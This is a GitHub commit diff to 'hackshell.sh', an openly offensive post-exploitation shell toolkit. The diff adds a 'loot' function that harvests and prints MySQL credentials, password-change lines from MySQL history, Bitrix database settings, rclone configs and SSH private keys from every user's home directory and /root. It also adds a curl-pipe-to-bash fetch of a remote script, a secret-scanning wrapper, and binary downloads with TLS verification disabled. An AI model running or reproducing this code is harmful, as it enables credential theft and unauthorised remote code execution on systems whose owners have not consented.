Skip to content

Commit 2d008ce

Browse files
rootTHCrootTHC
committed
loot
1 parent 66b267a commit 2d008ce

File tree

1 file changed

+104
-11
lines changed

1 file changed

+104
-11
lines changed

tools/hackshell.sh

Lines changed: 104 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -282,6 +282,7 @@ hs_mkhome() {
282282

283283
# Keep this seperate because this actually creates data.
284284
mk() {
285+
UHOME="${HOME}"
285286
export HOME="${XHOME}"
286287
echo -e "${CDM}HOME set to ${CDY}${XHOME}${CN}"
287288
echo -e "Undo with ${CDC}export HOME='${_HS_HOME_ORIG}'${CN}"
@@ -293,6 +294,16 @@ keep() {
293294
HS_INFO "Wont delete ${CDY}${XHOME}${CDM} on exit"
294295
}
295296

297+
np() {
298+
command -v noseyparker >/dev/null || { HS_ERR "Not found: noseyparker. Type ${CDC}bin${CN} first."; return 255;}
299+
local d="/tmp/.np-${UID}-$$"
300+
[ -d "${d}" ] && rm -rf "${d:?}"
301+
[ $# -le 0 ] && set - .
302+
NP_DATASTORE="$d" noseyparker -q scan "$1" >&2 || return
303+
NP_DATASTORE="$d" noseyparker report --color=always
304+
rm -rf "${d:?}"
305+
}
306+
296307
bin() {
297308
local arch="$(uname -m)"
298309
local os="$(uname -s)"
@@ -308,11 +319,14 @@ bin() {
308319
bin_dl() {
309320
local dst="${XHOME}/${1:?}"
310321
local str="${CDM}Downloading ${CDC}${1:?}${CDM}........................................"
322+
local is_skip
311323
echo -en "${str:0:64}"
312324
[ -s "${dst}" ] || rm -f "${dst:?}" 2>/dev/null
313-
command -v "${1}" >/dev/null && { echo -e "[${CDY}SKIPPED${CDM}]${CN}"; return 0; }
314-
{ err=$(dl "${2:?}" 2>&1 >&3 3>&-); } >"${XHOME}/${1:?}" 3>&1 || { echo -e ".[${CR}FAILED${CDM}]${CN}${CF}\n---> ${2}\n---> ${err}${CN}"; return 255; }
315-
chmod 711 "${XHOME}/${1}"
325+
[ -z "$FORCE" ] && command -v "${1}" >/dev/null && is_skip=1
326+
[ -n "$FORCE" ] && [ -s "$dst" ] && is_skip=1
327+
[ -n "$is_skip" ] && { echo -e "[${CDY}SKIPPED${CDM}]${CN}"; return 0; }
328+
{ err=$(dl "${2:?}" 2>&1 >&3 3>&-); } >"${dst}" 3>&1 || { echo -e ".[${CR}FAILED${CDM}]${CN}${CF}\n---> ${2}\n---> ${err}${CN}"; return 255; }
329+
chmod 711 "${dst}"
316330
echo -e ".....[${CDG}OK${CDM}]${CN}"
317331
}
318332

@@ -336,14 +350,93 @@ bin() {
336350
bin_dl zgrep "https://bin.ajam.dev/${a}/Baseutils/zgrep"
337351
bin_dl grep "https://bin.ajam.dev/${a}/Baseutils/grep"
338352
bin_dl tar "https://bin.ajam.dev/${a}/Baseutils/tar"
353+
bin_dl sed "https://bin.ajam.dev/${a}/Baseutils/secd"
339354
bin_dl nmap "https://bin.ajam.dev/${a}/nmap"
340355
bin_dl tcpdump "https://bin.ajam.dev/${a}/tcpdump"
356+
[ "$arch" = "x86_64" ] && bin_dl noseyparker "https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static"
341357

342-
echo -e ">>> ${CDG}Download COMPLETED${CN}"
358+
[ -z "$FORCE" ] && echo -e ">>> Use ${CDC}FORCE=1 bin${CN} to force download even if systemwide exists"
359+
echo -e ">>> ${CDG}Download COMPLETE${CN}"
343360

344361
unset -f bin_dl
345362
}
346363

364+
loot_sshkey() {
365+
local str="${CF}password protected"
366+
local fn="${1:?}"
367+
368+
[ ! -s "${fn}" ] && return
369+
grep -Fqam1 'PRIVATE KEY' "${fn}" || return
370+
371+
setsid -w ssh-keygen -y -f "${fn}" </dev/null &>/dev/null && str="${CDR}NO PASSWORD"
372+
echo -e "${CB}SSH Key ${CDY}${fn}${CN} ${str}${CDY}${CF}"
373+
cat "$fn"
374+
echo -en "${CN}"
375+
}
376+
377+
loot_bitrix() {
378+
local fn="${1:?}"
379+
[ ! -f "$fn" ] && return
380+
grep -Fqam1 '$_ENV[' "$fn" && return
381+
echo -e "${CB}Bitrix DB ${CDY}${fn}${CF}"
382+
grep --color=never -E "(host|database|login|password)'.*=" "${fn}"
383+
echo -en "${CN}"
384+
}
385+
386+
loot() {
387+
local h="${UHOME:-$HOME}"
388+
local str
389+
390+
for fn in "${HOMEDIR:-/home}"/*/.my.cnf /root/.my.cnf; do
391+
[ ! -s "$fn" ] && continue
392+
echo -e "${CB}MySQL ${CDY}${fn}${CF}"
393+
grep -vE "^(#|\[)" <"${fn}"
394+
echo -en "${CN}"
395+
# grep -E "^(user|password)" "${h}/.my"
396+
done
397+
for fn in "${HOMEDIR:-/home}"/*/.mysql_history /root/.mysql_history; do
398+
[ ! -s "$fn" ] && continue
399+
str=$(grep -ia '^SET PASSWORD FOR' "$fn") || continue
400+
echo -e "${CB}MySQL ${CDY}${fn}${CF}"
401+
echo "$str"
402+
echo -en "${CN}"
403+
done
404+
405+
### Bitrix
406+
for fn in "${HOMEDIR:-/home}"/*/*/bitrix/.settings.php; do
407+
loot_bitrix "$fn"
408+
done
409+
410+
find /var/www -maxdepth 6 -type f -wholename "*/bitrix/.settings.php" | while read -r fn; do
411+
loot_bitrix "$fn"
412+
done
413+
414+
### SSH Keys
415+
[ -e "/etc/ansible/ansible.cfg" ] && {
416+
str="$(grep ^private_key_file "/etc/ansible/ansible.cfg")"
417+
s="${str##*= }"
418+
loot_sshkey "$s"
419+
}
420+
421+
for fn in "${HOMEDIR:-/home}"/*/.ssh/* /root/.ssh/*; do
422+
loot_sshkey "$fn"
423+
done
424+
425+
### .config
426+
for fn in "${HOMEDIR:-/home}"/*/.config/rclone/rclone.conf /root/.config/rclone/rclone.conf; do
427+
[ ! -s "$fn" ] && continue
428+
echo -e "${CB}rclone ${CDY}${fn}${CF}"
429+
cat "$fn"
430+
echo -en "${CN}"
431+
done
432+
433+
HS_WARN "FIXME: This is ALPHA. Needs much more..."
434+
}
435+
436+
ws() {
437+
dl https://thc.org/ws | bash
438+
}
439+
347440
hs_exit() {
348441
cd /tmp || cd /dev/shm || cd /
349442
[ "${#_hs_bounce_src[@]}" -gt 0 ] && HS_WARN "Bounce still set in iptables. Type ${CDC}unbounce${CN} to stop the forward."
@@ -361,21 +454,18 @@ hs_exit() {
361454

362455
[ -z "$BASH" ] && TRAPEXIT() { hs_exit; } #zsh
363456

457+
### Functions (temporary)
364458
hs_init_dl() {
459+
# Ignore TLS certificate. This is DANGEROUS but many hosts have missing ca-bundles or TLS-Proxies.
365460
if command -v curl >/dev/null; then
366-
dl() {
367-
curl -fsSLk --proto-default https --connect-timeout 7 --retry 3 "${1:?}"
368-
}
461+
dl() { curl -fsSLk --proto-default https --connect-timeout 7 --retry 3 "${1:?}";}
369462
elif command -v wget >/dev/null; then
370463
dl() { wget -Op --no-check-certificate --connect-timeout=7 --dns-timeout=7 "${1:?}";}
371464
else
372-
dl() {
373-
HS_ERR "Not found: curl"
374-
}
465+
dl() { HS_ERR "Not found: curl"; }
375466
fi
376467
}
377468

378-
### Functions (temporary)
379469
hs_init() {
380470
local a
381471
local prg="$1"
@@ -458,6 +548,9 @@ ${CDC} find_subdomain .foobar.com ${CDM}Search files for sub-domain
458548
${CDC} crt foobar.com ${CDM}Query crt.sh for all sub-domains
459549
${CDC} rdns 1.2.3.4 ${CDM}Reverse DNS from multiple public databases
460550
${CDC} hide <pid> ${CDM}Hide a process
551+
${CDC} np <directory> ${CDM}Display secrets with NoseyParker ${CN}${CF}[try |less -R]
552+
${CDC} loot ${CDM}Display common secrets
553+
${CDC} ws ${CDM}WhatServer - display server's essentials
461554
${CDC} bin ${CDM}Download useful static binaries
462555
${CDC} xhelp ${CDM}This help"
463556
echo -e "${CN}"

0 commit comments

Comments
 (0)